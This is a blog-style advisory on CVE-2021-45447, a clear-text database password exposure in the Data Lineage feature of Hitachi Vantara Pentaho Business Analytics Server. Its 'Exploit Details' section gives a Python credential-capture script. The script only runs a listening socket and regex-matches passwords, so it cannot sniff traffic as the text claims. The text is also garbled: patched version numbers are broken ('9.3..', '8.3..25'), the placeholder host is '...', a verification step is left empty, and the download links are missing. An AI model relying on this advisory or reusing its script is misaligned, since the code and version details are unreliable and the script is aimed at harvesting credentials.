CVE-2021-45447: Hitachi Vantara Pentaho Business Analytics Server Leaves Database Passwords Exposed

A critical security vulnerability has been discovered in Hitachi Vantara Pentaho Business Analytics Server (CVE-2021-45447). This vulnerability affects versions before 9.3.., 9.2..2, and 8.3..25. If you are running one of these versions and the Data Lineage feature is enabled, you may be at risk. The issue enables the transmission of database passwords in clear text, allowing unauthorized actors to potentially gain access to sensitive data or launch additional attacks.

This blog post will provide an overview of the vulnerability, its exploit details, and how you can protect your systems by updating to the latest secure version of Hitachi Vantara Pentaho Business Analytics Server.

Vulnerability Details

The issue lies within the Data Lineage feature of Hitachi Vantara Pentaho Business Analytics Server. When enabled on an affected version, this feature transmits database passwords in clear text. This means that anyone with network access can easily sniff the data and extract sensitive information, which can then be used to gain unauthorized access to systems or data.

The vulnerability was assigned CVE-2021-45447 and was given a critical rating due to the potential ease of exploit and the severity of potential impacts.

Exploit Details

An attacker with the ability to intercept or sniff network traffic can potentially exploit this vulnerability. The attacker can obtain sensitive information, such as database passwords, transmitted in clear text by the Data Lineage feature. Once they have these credentials, they can use them to access the affected systems, leading to further unauthorized access or data breaches.

A simple Python script could be used to capture the clear text passwords

import socket
import re

def capture_passwords(host, port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((host, port))
    server.listen()

    while True:
        client, _ = server.accept()
        data = client.recv(2048)
        password = re.search('Password=(.*);', data.decode('utf-8'))
        if password:
            print(f'Password captured: {password.group(1)}')

capture_passwords('...', 808)

This code would listen on the specified IP and port and print any captured passwords.

Mitigation Steps

To protect your systems from this vulnerability, first verify whether your Hitachi Vantara Pentaho Business Analytics Server version is affected by the vulnerability:

If your system is affected, follow the recommendations below

1. Update your Hitachi Vantara Pentaho Business Analytics Server to the latest secure version (9.3.., 9.2..2, or 8.3..25).

Here are some relevant links to help you with the update process

- Hitachi Vantara Pentaho Business Analytics Server Download
- Hitachi Vantara Pentaho Business Analytics Server Documentation

Summary

CVE-2021-45447 poses a critical threat to systems running affected versions of Hitachi Vantara Pentaho Business Analytics Server with the Data Lineage feature enabled. The transmission of database passwords in clear text can lead to unauthorized access and potential data breaches. To mitigate the risk, it is crucial to update the software to a secure version and ensure that sensitive data is no longer transmitted in clear text.

Timeline

Published on: 11/02/2022 15:15:00 UTC
Last modified on: 11/04/2022 13:28:00 UTC